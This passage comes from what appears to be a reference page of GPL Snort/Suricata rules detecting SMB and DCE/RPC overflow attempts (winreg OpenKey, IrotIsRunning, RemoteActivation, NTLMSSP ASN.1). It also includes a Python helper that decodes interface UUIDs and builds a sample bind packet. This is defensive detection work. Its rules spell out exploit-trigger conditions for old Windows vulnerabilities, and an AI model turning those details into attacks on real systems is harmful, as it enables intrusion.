Performance Impact : Not defined
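
The winreg, IActivation and ISystemActivator bind rules above come in four variants each, and the variants differ only in two flag checks: the SMB Unicode flag (byte_test:1,&,128,6,relative) and the little-endian bit of the DCE/RPC data-representation byte (byte_test:1,&,16,3,relative). The 16 bytes matched at distance 29 after the 0x0B packet type are the interface UUID in wire order, which is why the content strings look nothing like the canonical UUIDs. The following is an added example, written for this page and not part of the GPL ruleset, that decodes those content strings into canonical UUIDs and parses a DCE/RPC bind PDU the way the rules do, honouring the drep byte order. The interface labels, helper names and the constructed sample PDU are assumptions of the example.

```python
import struct
import uuid

# Interface UUIDs exactly as the bind rules above carry them (Snort content syntax,
# wire byte order). The content strings are copied from the rules; the labels are ours.
BIND_RULE_CONTENT = {
    "winreg": "|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|",
    "IActivation": "|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W",
    "ISystemActivator": "|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F",
}

# Constructed: NDR 32-bit transfer syntax (8a885d04-1ceb-11c9-9fe8-08002b104860 v2), wire order.
NDR32_SYNTAX = bytes.fromhex("045d888aeb1cc9119fe808002b104860") + struct.pack("<I", 2)

DCERPC_BIND = 0x0B
DREP_LITTLE_ENDIAN = 0x10  # drep bit the rules test with byte_test:1,&,16,3,relative


def snort_content_to_bytes(spec):
    """Decode a Snort/Suricata content string: text outside |...| is literal, inside is hex."""
    out = bytearray()
    for i, part in enumerate(spec.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def wire_uuid(raw16, little_endian=True):
    """Render a 16-byte DCE/RPC GUID; the first three fields follow the sender's drep byte order."""
    return str(uuid.UUID(bytes_le=raw16) if little_endian else uuid.UUID(bytes=raw16))


def known_interfaces():
    """Map label -> canonical UUID string for the interfaces the bind rules watch."""
    return {name: wire_uuid(snort_content_to_bytes(c)) for name, c in BIND_RULE_CONTENT.items()}


def parse_bind(pdu):
    """Return (little_endian, [(ctx_id, abstract_uuid, major, minor), ...]) from a DCE/RPC v5 bind PDU."""
    if pdu[0] != 5 or pdu[2] != DCERPC_BIND:
        raise ValueError("not a DCE/RPC v5 bind PDU")
    le = bool(pdu[4] & DREP_LITTLE_ENDIAN)
    e = "<" if le else ">"
    # common header: ver, minor, ptype, pflags, drep[4], frag_len, auth_len, call_id
    frag_len, auth_len, call_id = struct.unpack_from(e + "HHI", pdu, 8)
    if frag_len > len(pdu):
        raise ValueError("truncated PDU")
    # bind body: max_xmit, max_recv, assoc_group, n_context_elem, 3 pad bytes -> contexts at 28
    n_ctx = pdu[24]
    off, ctxs = 28, []
    for _ in range(n_ctx):
        ctx_id, n_transfer = struct.unpack_from(e + "HB", pdu, off)
        off += 4                                     # ctx_id, n_transfer, pad
        abstract = wire_uuid(pdu[off:off + 16], le)  # the 16 bytes the rules match at distance 29
        version = struct.unpack_from(e + "I", pdu, off + 16)[0]
        ctxs.append((ctx_id, abstract, version & 0xFFFF, version >> 16))
        off += 20 + 20 * n_transfer                  # abstract syntax + transfer syntaxes
    return le, ctxs


def classify_bind(pdu):
    """Label each presentation context with the rule family it would trip, or None."""
    le, ctxs = parse_bind(pdu)
    by_uuid = {u: n for n, u in known_interfaces().items()}
    return [(ctx_id, by_uuid.get(u), le) for ctx_id, u, _, _ in ctxs]


def build_bind(abstract_raw16, call_id=1):
    """Constructed sample: little-endian bind with one context and one transfer syntax."""
    body = struct.pack("<HHIB3x", 5840, 5840, 0, 1)
    body += struct.pack("<HBx", 0, 1) + abstract_raw16 + struct.pack("<I", 1) + NDR32_SYNTAX
    hdr = struct.pack("<BBBB4sHHI", 5, 0, DCERPC_BIND, 0x03, b"\x10\x00\x00\x00",
                      16 + len(body), 0, call_id)
    return hdr + body


if __name__ == "__main__":
    for name, u in known_interfaces().items():
        print(f"{name:18} {u}")
    sample = build_bind(snort_content_to_bytes(BIND_RULE_CONTENT["winreg"]))
    print(classify_bind(sample))
```

One point worth keeping in mind when tuning these rules: the little-endian and non-little-endian variants match the identical 16-byte pattern, which is the little-endian encoding of the UUID. A sender that really used big-endian drep would emit the first three GUID fields reversed, so the non-little-endian variants only fire on that exact byte string regardless of what UUID it would then denote; in practice Windows clients always send little-endian drep and the distinction rarely matters.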

2103268

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103268; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning andx attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 2 (|00 02|) on a session where smb.tree.bind.irot was set, inside an SMB Trans to \PIPE\ on port 445; SMB Unicode flag clear, DCE/RPC little-endian bit clear. Reads the 4-byte little-endian value 8 bytes into the request stub, jumps that many bytes (4-byte aligned) and alerts when the 4-byte little-endian value at the new position exceeds 1024.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : CVE-2002-1561

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103269

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103269; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning little endian andx attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 2 (|02 00|) on a session where smb.tree.bind.irot was set, inside an SMB Trans to \PIPE\ on port 445; SMB Unicode flag clear, DCE/RPC little-endian bit set. Reads the 4-byte little-endian value 8 bytes into the request stub, jumps that many bytes (4-byte aligned) and alerts when the 4-byte little-endian value at the new position exceeds 1024.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : CVE-2002-1561

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103270

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning unicode andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103270; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning unicode andx attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 2 (|00 02|) on a session where smb.tree.bind.irot was set, inside an SMB Trans to \PIPE\ on port 445; SMB Unicode flag set, DCE/RPC little-endian bit clear. Reads the 4-byte little-endian value 8 bytes into the request stub, jumps that many bytes (4-byte aligned) and alerts when the 4-byte little-endian value at the new position exceeds 1024.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : CVE-2002-1561

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103271

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103271; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning unicode little endian andx attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 2 (|02 00|) on a session where smb.tree.bind.irot was set, inside an SMB Trans to \PIPE\ on port 445; SMB Unicode flag set, DCE/RPC little-endian bit set. Reads the 4-byte little-endian value 8 bytes into the request stub, jumps that many bytes (4-byte aligned) and alerts when the 4-byte little-endian value at the new position exceeds 1024.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : CVE-2002-1561

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103023

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103023; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx oversized Security Descriptor attempt

Attack target : Not defined

Description : Disabled in the ruleset as shipped (the rule line is commented out). Matches an SMB NT Trans request (command 0xA0 at offset 39) with subcommand NT_TRANSACT_CREATE (|01 00|) on port 445, SMB Unicode flag clear; follows the byte_jump into the NT Create parameters and alerts when the 4-byte little-endian value 40 bytes in, which the rule treats as the security descriptor length, exceeds 1024.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103025

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103025; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx oversized Security Descriptor attempt

Attack target : Not defined

Description : Disabled in the ruleset as shipped (the rule line is commented out). Matches an SMB NT Trans request (command 0xA0 at offset 39) with subcommand NT_TRANSACT_CREATE (|01 00|) on port 445, SMB Unicode flag set; follows the byte_jump into the NT Create parameters and alerts when the 4-byte little-endian value 40 bytes in, which the rule treats as the security descriptor length, exceeds 1024.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103230

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103230; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103231

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103231; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103232

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,2048,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103232; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103233

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,2048,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; reference:url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx; classtype:attempted-admin; sid:2103233; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377|url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103421

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103421; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103422

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103422; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103423

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation unicode andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103423; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103424

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103424; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103004

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP andx asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103004; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup NTMLSSP andx asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103005

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Session Setup NTMLSSP unicode andx asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103005; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Session Setup NTMLSSP unicode andx asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103142

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Trans2 FIND_FIRST2 andx attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:29; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103142; rev:3; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 FIND_FIRST2 andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 3

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103252

